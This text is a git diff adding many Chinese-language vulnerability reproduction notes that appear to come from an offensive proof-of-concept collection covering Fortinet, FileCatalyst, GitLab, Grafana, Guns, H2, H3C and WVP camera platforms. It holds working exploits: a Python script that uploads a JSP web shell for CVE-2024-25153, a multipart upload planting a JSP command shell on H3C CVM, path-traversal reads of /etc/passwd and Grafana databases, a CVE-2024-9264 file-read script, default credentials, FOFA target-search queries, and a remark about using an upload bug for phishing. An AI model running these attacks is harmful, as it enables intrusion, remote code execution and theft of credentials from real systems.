@@ -0,0 +1,25 @@ +# Fortinet FortiOS message存在xss漏洞 + +# 一、漏洞简介 +Fortinet FortiOS是美国飞塔(Fortinet)公司的一套专用于FortiGate网络安全平台上的安全操作系统。该系统为用户提供防火墙、防病毒、IPSec/SSLVPN、Web内容过滤和反垃圾邮件等多种安全功能。 Fortinet FortiOS 6.0.0版本至6.0.4版本、5.6.0版本至5.6.7版本和5.4及之前版本中的SSL VPN Web门户存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 + +# 二、影响版本 ++ Fortinet Fortios 6.2 Fortinet Fortios 6.0.5 Fortinet Fortios 5.6.8 + +# 三、资产测绘 ++ fofa`app="FORTINET-SSLVPN"` ++ 特征 + +![1708092353453-aa4ebd52-c568-4244-9a91-8c5c81c9e9ec.png](./img/0z6DxK_7a53VYND6/1708092353453-aa4ebd52-c568-4244-9a91-8c5c81c9e9ec-153803.png) + +# 四、漏洞复现 +```java +/message?title=x&msg=%26%23; +``` + +![1708092676710-d70e54d3-4e63-4221-bde2-42a5a8c02563.png](./img/0z6DxK_7a53VYND6/1708092676710-d70e54d3-4e63-4221-bde2-42a5a8c02563-562975.png) + + + +> 更新: 2024-02-29 23:57:11 +> 原文: \ No newline at end of file diff --git a/Fortra-FileCatalyst-Workflow远程代码执行漏漏洞(CVE-2024-25153).md b/Fortra-FileCatalyst-Workflow远程代码执行漏漏洞(CVE-2024-25153).md new file mode 100644 index 0000000..c593b53 --- /dev/null +++ b/Fortra-FileCatalyst-Workflow远程代码执行漏漏洞(CVE-2024-25153).md 
@@ -0,0 +1,94 @@ +## Fortra FileCatalyst Workflow远程代码执行漏漏洞(CVE-2024-25153) + + +## poc +```python +#!/usr/bin/python3 +""" + +Exploit for CVE-2024-25153: Remote Code Execution in Fortra FileCatalyst Workflow 5.x, before 5.1.6 Build 114 +Full details can be found at https://labs.nettitude.com/blog/cve-2024-25153-remote-code-execution-in-fortra-filecatalyst + +Usage: CVE-2024-25153.py --host {hostname} --port {port} --url {url} --cmd {command} + +""" +import requests +import argparse +import re +import uuid +import urllib.parse + +def exploit(host, port, url, cmd, secret): + s = requests.Session() + try: + session_response = s.get(f"{host}:{port}/{url}") + + # Find session token + session_pattern = "\/workflow\/jsp\/logon.jsp;jsessionid=[A-Za-z0-9]+" + + if(re.search(session_pattern,session_response.text) is None): + print("[-] => Error getting session token. Check the -u parameter is correct.") + return + + # Redirect to main login + redirect = re.findall(session_pattern, session_response.text)[0] + redirect_response = s.get(f"{host}:{port}{redirect}") + + # Perform anonymous login + login_pattern = "\/workflow\/logonAnonymous.do\?FCWEB.FORM.TOKEN=[A-Za-z0-9]+" + + if(re.search(login_pattern,redirect_response.text) is None): + print("[-] => Error logging in. Check anonymous login is enabled.") + return + + login = re.findall(login_pattern, redirect_response.text)[0] + + login_response = s.get(f"{host}:{port}{login}") + + # Upload our shell + exploit_url = f"{host}:{port}/{url}/servlet/ftpservlet?wf=octetStream&h=example.com&u=%58%58&p=%58%58&prt=21&c=PUT&sid=CVE-2024-25153/../../CVE-2024-25153/"; # WARNING: Take great care if modifying the upload path (sid parameter). Attempting to upload in the top-level web root will delete the entire application. 
+ exploit_headers = {"User-Agent": "CVE-2024-25153", "Content-Type": "application/octet-stream", "X-File-Name": secret + ".jsp"} + exploit_data = """<%@ page import=\"java.util.*,java.io.*\"%> + <% + if (request.getParameter(\"cmd\") != null) { + Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\")); + OutputStream os = p.getOutputStream(); + InputStream in = p.getInputStream(); + DataInputStream dis = new DataInputStream(in); + String disr = dis.readLine(); + while ( disr != null ) { + out.println(disr); + disr = dis.readLine(); + } + } + %>""" + exploit_response = s.post(exploit_url, headers=exploit_headers, data=exploit_data) + + if("success" not in exploit_response.text): + print("[-] => Error uploading file. Target may not be vulnerable.") + return + + # Call the shell + cmd_safe = urllib.parse.quote(cmd) + cmd_response = s.get(f"{host}:{port}/{url}/CVE-2024-25153/{secret}.jsp?cmd={cmd_safe}") + print(cmd_response.text.strip()) + + + except requests.exceptions.RequestException as e: + print(f"[-] => Error occurred for {url}. Target may not be vulnerable.") + + +if __name__ == "__main__": + parser = argparse.ArgumentParser() + parser.add_argument("-t","--host", type=str, help="target hostname or IP address (include http:// or https://)", required=True) + parser.add_argument("-p","--port", type=int, default=8080, help="target port (Default: 8080)") + parser.add_argument("-u","--url", type=str, default="workflow", help="URL where FileCatalyst Workflow is installed (Default: workflow)") + parser.add_argument("-c","--cmd", type=str, default="id", help="OS command to run (Default: id)") + args = parser.parse_args() + + exploit(args.host, args.port, args.url, args.cmd, str(uuid.uuid4())) +``` + +``` +CVE-2024-25153.py --host --port --url --cmd +``` diff --git a/GB28181摄像头管理平台WVP视频平台存在弱口令漏洞.md b/GB28181摄像头管理平台WVP视频平台存在弱口令漏洞.md new file mode 100644 index 0000000..5bf8b7f --- /dev/null +++ b/GB28181摄像头管理平台WVP视频平台存在弱口令漏洞.md 
@@ -0,0 +1,31 @@ +# GB28181摄像头管理平台WVP视频平台存在弱口令漏洞 + +# 一、产品简介 + GB28181是中国国家标准中关于IP视频监控设备的标准之一。它规定了视频监控设备之间的通信协议和数据格式,以便实现设备之间的互联互通。GB28181摄像头管理平台则是用于管理和监控这些符合GB28181标准的摄像头设备的软件平台,GB28181摄像头管理平台在安防领域具有广泛的应用,可以用于监控各种场所,如公共交通、城市道路、企业园区等,提高了监控系统的整体效率和管理水平。WVWVP-GB28181摄像头管理平台存在弱口令,攻击者可利用此漏洞收集敏感信息,从而为下一步攻击做准备。 ![1715270773197-7403b852-9ccb-443d-aa6e-ec05f84c76bb.png](./img/eCwRSGVlFXXKHea5/1715270773197-7403b852-9ccb-443d-aa6e-ec05f84c76bb-624450.png) + +# 二、影响版本 + WVP视频平台 + +# 三、资产测绘 +```plain +body="国标28181" +``` + +![1715269904082-a474df98-5550-4823-95dc-5ce4290ea873.png](./img/eCwRSGVlFXXKHea5/1715269904082-a474df98-5550-4823-95dc-5ce4290ea873-603576.png) + +## 四、漏洞复现 +```yaml +admin/admin +``` + +![1716998795402-3c0bda12-379b-4a04-8f59-a89f3af2c220.png](./img/eCwRSGVlFXXKHea5/1716998795402-3c0bda12-379b-4a04-8f59-a89f3af2c220-356426.png) + +![1716998843960-7568af22-05cf-4612-86eb-eafb2e220b52.png](./img/eCwRSGVlFXXKHea5/1716998843960-7568af22-05cf-4612-86eb-eafb2e220b52-309982.png) + +## + + + + +> 更新: 2024-06-07 14:19:23 +> 原文: \ No newline at end of file diff --git a/GB28181摄像头管理平台WVP视频平台存在接口文档信息泄露漏洞.md b/GB28181摄像头管理平台WVP视频平台存在接口文档信息泄露漏洞.md new file mode 100644 index 0000000..025f5da --- /dev/null +++ b/GB28181摄像头管理平台WVP视频平台存在接口文档信息泄露漏洞.md 
@@ -0,0 +1,28 @@ +# GB28181摄像头管理平台WVP视频平台存在接口文档信息泄露漏洞 + +# 一、产品简介 + GB28181是中国国家标准中关于IP视频监控设备的标准之一。它规定了视频监控设备之间的通信协议和数据格式,以便实现设备之间的互联互通。GB28181摄像头管理平台则是用于管理和监控这些符合GB28181标准的摄像头设备的软件平台,GB28181摄像头管理平台在安防领域具有广泛的应用,可以用于监控各种场所,如公共交通、城市道路、企业园区等,提高了监控系统的整体效率和管理水平。GB28181摄像头管理平台WVP视频平台存在接口文档信息泄露漏洞,恶意攻击者可以通过此漏洞获取到接口数据![1715270773197-7403b852-9ccb-443d-aa6e-ec05f84c76bb.png](./img/HP4DBBHew-HSYzmD/1715270773197-7403b852-9ccb-443d-aa6e-ec05f84c76bb-309257.png) + +# 二、影响版本 + WVP视频平台 + +# 三、资产测绘 +```plain +body="国标28181" +``` + +![1715269904082-a474df98-5550-4823-95dc-5ce4290ea873.png](./img/HP4DBBHew-HSYzmD/1715269904082-a474df98-5550-4823-95dc-5ce4290ea873-597474.png) + +## 四、漏洞复现 + + +```yaml +/doc.html +``` + +![1717440534393-b70141ea-46e4-4596-8995-de741648a8c1.png](./img/HP4DBBHew-HSYzmD/1717440534393-b70141ea-46e4-4596-8995-de741648a8c1-266338.png) + + + +> 更新: 2024-06-07 14:19:23 +> 原文: \ No newline at end of file diff --git a/GB28181摄像头管理平台WVP视频平台存在敏感信息泄露漏洞.md b/GB28181摄像头管理平台WVP视频平台存在敏感信息泄露漏洞.md new file mode 100644 index 0000000..2f28e40 --- /dev/null +++ b/GB28181摄像头管理平台WVP视频平台存在敏感信息泄露漏洞.md 
@@ -0,0 +1,29 @@ +# GB28181摄像头管理平台WVP视频平台存在敏感信息泄露漏洞 + +# 一、产品简介 + GB28181是中国国家标准中关于IP视频监控设备的标准之一。它规定了视频监控设备之间的通信协议和数据格式,以便实现设备之间的互联互通。GB28181摄像头管理平台则是用于管理和监控这些符合GB28181标准的摄像头设备的软件平台,GB28181摄像头管理平台在安防领域具有广泛的应用,可以用于监控各种场所,如公共交通、城市道路、企业园区等,提高了监控系统的整体效率和管理水平。GB28181摄像头管理平台api接口处存在未授权漏洞,恶意攻击者可以通过此漏洞获取到登录信息,从而登录到后台,使服务器处于不安全的状态 ![1715270773197-7403b852-9ccb-443d-aa6e-ec05f84c76bb.png](./img/vhv8DMGLU3HVem8R/1715270773197-7403b852-9ccb-443d-aa6e-ec05f84c76bb-479686.png) + +# 二、影响版本 + WVP视频平台 + +# 三、资产测绘 +```plain +body="国标28181" +``` + +![1715269904082-a474df98-5550-4823-95dc-5ce4290ea873.png](./img/vhv8DMGLU3HVem8R/1715269904082-a474df98-5550-4823-95dc-5ce4290ea873-791258.png) + +## 四、漏洞复现 +```http +GET /api/user/all HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 +``` + +![1715269724994-d04cb343-8099-4450-8a81-ffe1ee1b9ea6.png](./img/vhv8DMGLU3HVem8R/1715269724994-d04cb343-8099-4450-8a81-ffe1ee1b9ea6-323150.png)使用admin/解密后的密码登录系统 ![1715269814518-8be4d2fb-dd7a-4bab-8183-0fda67f3e1ae.png](./img/vhv8DMGLU3HVem8R/1715269814518-8be4d2fb-dd7a-4bab-8183-0fda67f3e1ae-187789.png) + + + +> 更新: 2024-06-11 10:36:45 +> 原文: \ No newline at end of file diff --git a/GitLabAPI未授权SSRF漏洞(CVE-2021-22214).md b/GitLabAPI未授权SSRF漏洞(CVE-2021-22214).md new file mode 100644 index 0000000..4f8f12e --- /dev/null +++ b/GitLabAPI未授权SSRF漏洞(CVE-2021-22214).md 
@@ -0,0 +1,42 @@ +# GitLab API未授权SSRF漏洞(CVE-2021-22214) + +# 一、漏洞简介 +GitLab存在前台未授权SSRF漏洞,未授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求 + +# 二、影响版本 +13.10.5 > GitLab >= 10.5 + +13.11.5 > GitLab >= 13.11 + +13.12.2 > GitLab >= 13.12 + +# 三、资产测绘 ++ fofa`app="GitLab"` ++ 特征 + +![1721111619268-5863c992-b306-41aa-bc6b-79164c134ed3.png](./img/YHP79yE5zWVjScmt/1721111619268-5863c992-b306-41aa-bc6b-79164c134ed3-435493.png) + +# 四、漏洞复现 +```http +POST /api/v4/ci/lint HTTP/1.1 +Host: +Cache-Control: max-age=0 +DNT: 1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/json +Content-Length: 113 + + +{"include_merged_yaml": true, "content": "include:\n remote: http://ynuujrnegu.dgrh3.cn/api/v1/targets?test.yml"} +``` + +![1721111645089-c6026c90-8d00-4177-b710-4a3d1abcea1a.png](./img/YHP79yE5zWVjScmt/1721111645089-c6026c90-8d00-4177-b710-4a3d1abcea1a-842840.png) + + + +> 更新: 2024-09-05 23:24:41 +> 原文: \ No newline at end of file diff --git a/Grafana存在任意文件读取漏洞.md b/Grafana存在任意文件读取漏洞.md new file mode 100644 index 0000000..25d05d9 --- /dev/null +++ b/Grafana存在任意文件读取漏洞.md 
@@ -0,0 +1,78 @@ +# Grafana存在任意文件读取漏洞 + +# 一、漏洞描述 +Grafana是一个开源的可视化和分析平台,一个通用的可视化工具。‘通用’意味着Grafana不仅仅适用于展示Prometheus下的监控数据,也同样适用于一些其他的数据可视化需求。Grafana存在任意文件读取漏洞 + +# 二、影响版本 +Grafana + +# 三、资产测绘 +```plain +app="Grafana" +``` + +![1727014008181-843b9798-1b88-4f7d-a968-ec49cfcfc74a.png](./img/8Nx1Nu4Ynx9J9B-F/1727014008181-843b9798-1b88-4f7d-a968-ec49cfcfc74a-677927.png) + +# 三、漏洞复现 +```plain +GET /public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 +Host: +Content-Length: 2 +``` + +![1727017201650-ed9abda9-2b7f-4967-8f25-f7ed73941133.png](./img/8Nx1Nu4Ynx9J9B-F/1727017201650-ed9abda9-2b7f-4967-8f25-f7ed73941133-616038.png) + +读取配置文件 + +```plain +GET /public/plugins/gettingstarted/../../../../../../../../../../../../../../../etc/grafana/grafana.ini HTTP/1.1 +Host: +Content-Length: 2 +``` + +数据库 + +```plain +GET /public/plugins/gettingstarted/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1 +Host: +Content-Length: 2 +``` + +其他读取路径 + +```plain +/public/plugins/alertGroups/../../../../../../../../etc/passwd +/public/plugins/alertlist/../../../../../../../../etc/passwd +/public/plugins/annolist/../../../../../../../../etc/passwd +/public/plugins/barchart/../../../../../../../../etc/passwd +/public/plugins/bargauge/../../../../../../../../etc/passwd +/public/plugins/canvas/../../../../../../../../etc/passwd +/public/plugins/dashlist/../../../../../../../../etc/passwd +/public/plugins/debug/../../../../../../../../etc/passwd +/public/plugins/gauge/../../../../../../../../etc/passwd +/public/plugins/geomap/../../../../../../../../etc/passwd +/public/plugins/gettingstarted/../../../../../../../../etc/passwd +/public/plugins/graph/../../../../../../../../etc/passwd +/public/plugins/heatmap/../../../../../../../../etc/passwd +/public/plugins/histogram/../../../../../../../../etc/passwd +/public/plugins/live/../../../../../../../../etc/passwd +/public/plugins/logs/../../../../../../../../etc/passwd 
+/public/plugins/news/../../../../../../../../etc/passwd +/public/plugins/nodeGraph/../../../../../../../../etc/passwd +/public/plugins/piechart/../../../../../../../../etc/passwd +/public/plugins/pluginlist/../../../../../../../../etc/passwd +/public/plugins/stat/../../../../../../../../etc/passwd +/public/plugins/state-timeline/../../../../../../../../etc/passwd +/public/plugins/status-history/../../../../../../../../etc/passwd +/public/plugins/table/../../../../../../../../etc/passwd +/public/plugins/table-old/../../../../../../../../etc/passwd +/public/plugins/text/../../../../../../../../etc/passwd +/public/plugins/timeseries/../../../../../../../../etc/passwd +/public/plugins/welcome/../../../../../../../../etc/passwd +/public/plugins/xychart/../../../../../../../../etc/passwd +``` + + + +> 更新: 2024-10-22 09:41:43 +> 原文: \ No newline at end of file diff --git a/Grafana存在未授权访问漏洞.md b/Grafana存在未授权访问漏洞.md new file mode 100644 index 0000000..79c870c --- /dev/null +++ b/Grafana存在未授权访问漏洞.md @@ -0,0 +1,30 @@ +# Grafana存在未授权访问漏洞 + +# 一、漏洞描述 +Grafana是一个开源的可视化和分析平台,一个通用的可视化工具。‘通用’意味着Grafana不仅仅适用于展示Prometheus下的监控数据,也同样适用于一些其他的数据可视化需求。Grafana存在未授权访问漏洞,未经身份验证的用户可以绕过前端安全认证,未授权访问通过登录页面访问系统仪表板区域。 + +# 二、影响版本 +Grafana + +# 三、资产测绘 +```plain +app="Grafana" +``` + +![1727014008181-843b9798-1b88-4f7d-a968-ec49cfcfc74a.png](./img/Jh4jQ6Q82EoPxhu7/1727014008181-843b9798-1b88-4f7d-a968-ec49cfcfc74a-024790.png) + +# 三、漏洞复现 +```plain +/?orgId=1 +``` + +![1727013899091-bb094584-ee26-41f8-b445-b706c96dd975.png](./img/Jh4jQ6Q82EoPxhu7/1727013899091-bb094584-ee26-41f8-b445-b706c96dd975-586462.png) + +```plain +/metrics +``` + + + +> 更新: 2024-10-22 09:41:43 +> 原文: \ No newline at end of file diff --git a/Grafana存在默认口令漏洞.md b/Grafana存在默认口令漏洞.md new file mode 100644 index 0000000..d5350a3 --- /dev/null +++ b/Grafana存在默认口令漏洞.md 
@@ -0,0 +1,26 @@ +# Grafana存在默认口令漏洞 + +# 一、漏洞描述 +Grafana是一个开源的可视化和分析平台,一个通用的可视化工具。‘通用’意味着Grafana不仅仅适用于展示Prometheus下的监控数据,也同样适用于一些其他的数据可视化需求。Grafana存在默认口令漏洞 + +# 二、影响版本 +Grafana + +# 三、资产测绘 +```plain +app="Grafana" +``` + +![1727014008181-843b9798-1b88-4f7d-a968-ec49cfcfc74a.png](./img/ZUN4kTuU7qSHRsVR/1727014008181-843b9798-1b88-4f7d-a968-ec49cfcfc74a-807739.png) + +# 三、漏洞复现 +```plain +admin/admin +``` + +![1727014051613-fb02a5a8-057a-4396-aae0-61c173146bff.png](./img/ZUN4kTuU7qSHRsVR/1727014051613-fb02a5a8-057a-4396-aae0-61c173146bff-333768.png) + + + +> 更新: 2024-10-22 09:41:43 +> 原文: \ No newline at end of file diff --git a/Grafana表达式远程代码执行(CVE-2024-9264).md b/Grafana表达式远程代码执行(CVE-2024-9264).md new file mode 100644 index 0000000..56962fc --- /dev/null +++ b/Grafana表达式远程代码执行(CVE-2024-9264).md 
@@ -0,0 +1,157 @@ +# Grafana表达式远程代码执行(CVE-2024-9264) + +Grafana 的 SQL 表达式实验功能允许评估包含用户输入的“duckdb”查询。这些查询在传递给“duckdb”之前没有得到充分的净化,从而导致命令注入和本地文件包含漏洞。任何具有 VIEWER 或更高权限的用户都能够执行此攻击。 “duckdb”二进制文件必须存在于 Grafana 的 $PATH 中才能使此攻击起作用;默认情况下,此二进制文件未安装在 Grafana 发行版中。 + +## 影响版本 + +Grafana >= v11.0.0 (all v11.x.y are impacted) + +## poc + +```javascript +POST /api/ds/query?ds_type=__expr__&expression=true&requestId=Q100 HTTP/1.1 +Host: 127.0.0.1:3000 +Content-Type: application/json +Cookie: grafana_session=a739fa9aeb235f2790f17de00fefe528 +Content-Length: 368 + +{ + "from": "1696154400000", + "to": "1696345200000", + "queries": [ + { + "datasource": { + "name": "Expression", + "type": "__expr__", + "uid": "__expr__" + }, + "expression": "SELECT * FROM read_csv_auto('/etc/passwd');", + "hide": false, + "refId": "B", + "type": "sql", + "window": "" + } + ] +} + +``` + +![image-20241022092542872](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410220925944.png) + +## python + +```python +#!/usr/bin/env python3 + +""" +Grafana File Read PoC (CVE-2024-9264) +Author: z3k0sec // www.zekosec.com +""" + + +import requests +import json +import sys +import argparse + +class Console: + def log(self, msg): + print(msg, file=sys.stderr) + +console = Console() + +def msg_success(msg): + console.log(f"[SUCCESS] {msg}") + +def msg_failure(msg): + console.log(f"[FAILURE] {msg}") + +def failure(msg): + msg_failure(msg) + sys.exit(1) + +def authenticate(s, url, u, p): + res = s.post(f"{url}/login", json={"password": p, "user": u}) + if res.json().get("message") == "Logged in": + msg_success(f"Logged in as {u}:{p}") + else: + failure(f"Failed to log in as {u}:{p}") + +def run_query(s, url, query): + query_url = f"{url}/api/ds/query?ds_type=__expr__&expression=true&requestId=1" + query_payload = { + "from": "1696154400000", + "to": "1696345200000", + "queries": [ + { + "datasource": { + "name": "Expression", + "type": "__expr__", + "uid": "__expr__" + }, + "expression": query, + "hide": 
False, + "refId": "B", + "type": "sql", + "window": "" + } + ] + } + + res = s.post(query_url, json=query_payload) + data = res.json() + + # Handle unexpected response + if "message" in data: + msg_failure("Unexpected response:") + msg_failure(json.dumps(data, indent=4)) + return None + + # Extract results + frames = data.get("results", {}).get("B", {}).get("frames", []) + + if frames: + values = [ + row + for frame in frames + for row in frame["data"]["values"] + ] + + if values: + msg_success("Successfully ran DuckDB query:") + return values + + failure("No valid results found.") + +def decode_output(values): + return [":".join(str(i) for i in row if i is not None) for row in values] + +def main(url, user="admin", password="admin", file=None): + s = requests.Session() + authenticate(s, url, user, password) + file = file or "/etc/passwd" + escaped_filename = requests.utils.quote(file) + query = f"SELECT * FROM read_csv_auto('{escaped_filename}');" + content = run_query(s, url, query) + if content: + msg_success(f"Retrieved file {file}:") + for line in decode_output(content): + print(line) + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="Arbitrary File Read in Grafana via SQL Expression (CVE-2024-9264).") + parser.add_argument("--url", help="URL of the Grafana instance to exploit") + parser.add_argument("--user", default="admin", help="Username to log in as, defaults to 'admin'") + parser.add_argument("--password", default="admin", help="Password used to log in, defaults to 'admin'") + parser.add_argument("--file", help="File to read on the server, defaults to '/etc/passwd'") + + + args = parser.parse_args() + main(args.url, args.user, args.password, args.file) + +``` + +## 漏洞来源 + +- https://zekosec.com/blog/file-read-grafana-cve-2024-9264/ +- https://github.com/z3k0sec/File-Read-CVE-2024-9264 diff --git a/Guns后台任意文件上传漏洞.md b/Guns后台任意文件上传漏洞.md new file mode 100644 index 0000000..6aca557 --- /dev/null +++ b/Guns后台任意文件上传漏洞.md 
@@ -0,0 +1,48 @@ +# Guns后台任意文件上传漏洞 + +Guns后台任意文件上传漏洞 + +## poc + +```javascript +POST /api/sysFileInfo/upload HTTP/1.1 +Host: 192.168.91.130:9000 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept: application/json, text/plain, */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Referer: http://192.168.91.1:9000/system/structure/user +Authorization: eyJhbGciOiJIUzUxMiJ9.eyJ1c2VySWQiOjEzMzk1NTA0Njc5Mzk2MzkyOTksImFjY291bnQiOiJhZG1pbiIsInV1aWQiOiI1NmQzZjczNy1hNjU1LTRjYzgtODRkNi0xNDdjYTE1M2Y5OGIiLCJyZW1lbWJlck1lIjpmYWxzZSwiZXhwaXJhdGlvbkRhdGUiOjE3MzUxMDM0MDM0ODgsImNhVG9rZW4iOm51bGwsIm90aGVycyI6bnVsbCwic3ViIjoiMTMzOTU1MDQ2NzkzOTYzOTI5OSIsImlhdCI6MTczNDQ5ODYwMywiZXhwIjoxNzM1MTAzNDAzfQ.Ur3bUwltSXWUtIT1OOR4MV4frJeRy_MDEkmYg99F5L2DOx6C4ha_y476dTWMy7gAJZsq5x_2C_VEkWxWv7uHXw +Content-Type: multipart/form-data; boundary=---------------------------4047569836919132683218702 +Content-Length: 510 +Origin: http://192.168.91.130:9000 +Connection: close + +-----------------------------4047569836919132683218702 +Content-Disposition: form-data; name="file"; filename=".exe" +Content-Type: image/png + +1111 +-----------------------------4047569836919132683218702 +Content-Disposition: form-data; name="secretFlag" + +N +-----------------------------4047569836919132683218702 +Content-Disposition: form-data; name="fileBucket" + +../../../../../../../../../../../../../../../../../../看到请点击exe备份 +-----------------------------4047569836919132683218702-- +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412300945840.png) + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412300946118.png) + +可以用在钓鱼,如果项目在c盘,可以放到启动项中, +这里可以看到是在哪个盘 + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412300946901.png) + +## 漏洞来源 + +- https://xz.aliyun.com/t/16808?time__1311=Gui%3DGIfDODkD%2FD0lD2DUxQw860LQcrpD#toc-0 \ No newline at end 
of file diff --git a/H2dbconsole未授权访问.md b/H2dbconsole未授权访问.md new file mode 100644 index 0000000..1e064bc --- /dev/null +++ b/H2dbconsole未授权访问.md @@ -0,0 +1,34 @@ +# H2db console 未授权访问 + +# 一、漏洞简介 +H2 database是一款Java内存数据库,多用于单元测试。H2 database自带一个Web管理页面,在Spirng开发中,如果我们设置如下选项,即可允许外部用户访问Web管理页面,且没有鉴权: + +spring.h2.console.enabled=true +spring.h2.console.settings.web-allow-others=true +利用这个管理页面,我们可以进行JNDI注入攻击,进而在目标环境下执行任意命令。 + +# 二、影响版本 ++ H2db console + +# 三、资产测绘 ++ hunter`web.title="H2 Console"` ++ 特征 + +![1698938977757-5a84b3ed-9af6-4a39-9192-0a640c403137.png](./img/Wn3sGvLw1T50-kc2/1698938977757-5a84b3ed-9af6-4a39-9192-0a640c403137-807420.png) + +# 四、漏洞复现 +点击连接直接登陆 + +![1698939747766-ce382cf1-fd30-4072-a243-d056254aa53c.png](./img/Wn3sGvLw1T50-kc2/1698939747766-ce382cf1-fd30-4072-a243-d056254aa53c-612815.png) + +![1698939773633-8e03f70c-e23b-4740-8f8e-040bd0a3bafd.png](./img/Wn3sGvLw1T50-kc2/1698939773633-8e03f70c-e23b-4740-8f8e-040bd0a3bafd-654250.png) + +可执行sql命令 + +![1698939824783-9a31e347-1b96-4a4c-ada7-f5f33758d27d.png](./img/Wn3sGvLw1T50-kc2/1698939824783-9a31e347-1b96-4a4c-ada7-f5f33758d27d-400521.png) + + + + +> 更新: 2024-02-29 23:57:33 +> 原文: \ No newline at end of file diff --git a/H3C-CVM-fd接口前台任意文件上传漏洞复现.md b/H3C-CVM-fd接口前台任意文件上传漏洞复现.md new file mode 100644 index 0000000..a64812e --- /dev/null +++ b/H3C-CVM-fd接口前台任意文件上传漏洞复现.md 
@@ -0,0 +1,39 @@ +## H3C-CVM-fd接口前台任意文件上传漏洞复现 + + H3C CVM /cas/fileUpload/fd 接口存在任意文件上传漏洞,未授权的攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。 + +## fofa + +```javascript +app="H3C-CVM" +``` + +## poc + +```javascript +POST /cas/fileUpload/fd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.123 Safari/537.36 +Connection: close +Content-Type: multipart/form-data; boundary=WebKitFormBoundaryMMqEBbEFHlzOcYq4 +Connection: close + +--WebKitFormBoundaryMMqEBbEFHlzOcYq4 +Content-Disposition: form-data; name="token" + +/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/a.jsp +--WebKitFormBoundaryMMqEBbEFHlzOcYq4 +Content-Disposition: form-data; name="file"; filename="a.jsp" +Content-Type: image/png + +<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("
");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("
");new java.io.File(application.getRealPath(request.getServletPath())).delete();%> +--WebKitFormBoundaryMMqEBbEFHlzOcYq4-- +``` + +![image-20241106171738287](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411061717362.png) + +访问文件路径 + +``` +/cas/js/lib/buttons/a.jsp +``` \ No newline at end of file diff --git a/H3C-H100路由器-信息泄露漏洞.md b/H3C-H100路由器-信息泄露漏洞.md new file mode 100644 index 0000000..0f225b5 --- /dev/null +++ b/H3C-H100路由器-信息泄露漏洞.md @@ -0,0 +1,27 @@ +# H3C-H100路由器-信息泄露漏洞 + +# 一、漏洞简介 +H3C Magic H100是新华三技术有限公司特别设计的全千兆家庭智能中枢。H3C-H100路由器信息泄露漏洞,可泄露用户泄露密码 + +# 二、影响版本 ++ H3C多系列路由器 + +# 三、资产测绘 ++ fofa`body="/grwizard/h3c.ico"` ++ 登录页面![1713637393108-3b6d8d9c-19f1-4717-92a7-27c6d8d31adb.png](./img/LtjRIrDMAFrjFfcj/1713637393108-3b6d8d9c-19f1-4717-92a7-27c6d8d31adb-323113.png) + +# 四、漏洞复现 +```java +/h3c/local/ssidName +``` + +密码就在ssidKey字段 + +![1713637470972-d19fa597-a666-4004-a47a-025f92a849b7.png](./img/LtjRIrDMAFrjFfcj/1713637470972-d19fa597-a666-4004-a47a-025f92a849b7-813780.png) + +![1713637498157-5d0026b7-2372-4d1b-825b-234215c5d89b.png](./img/LtjRIrDMAFrjFfcj/1713637498157-5d0026b7-2372-4d1b-825b-234215c5d89b-491262.png) + + + +> 更新: 2024-04-22 13:29:11 +> 原文: \ No newline at end of file diff --git a/H3C-Magic-B1STV100R012-RCE.md b/H3C-Magic-B1STV100R012-RCE.md new file mode 100644 index 0000000..4ad7f18 --- /dev/null +++ b/H3C-Magic-B1STV100R012-RCE.md 
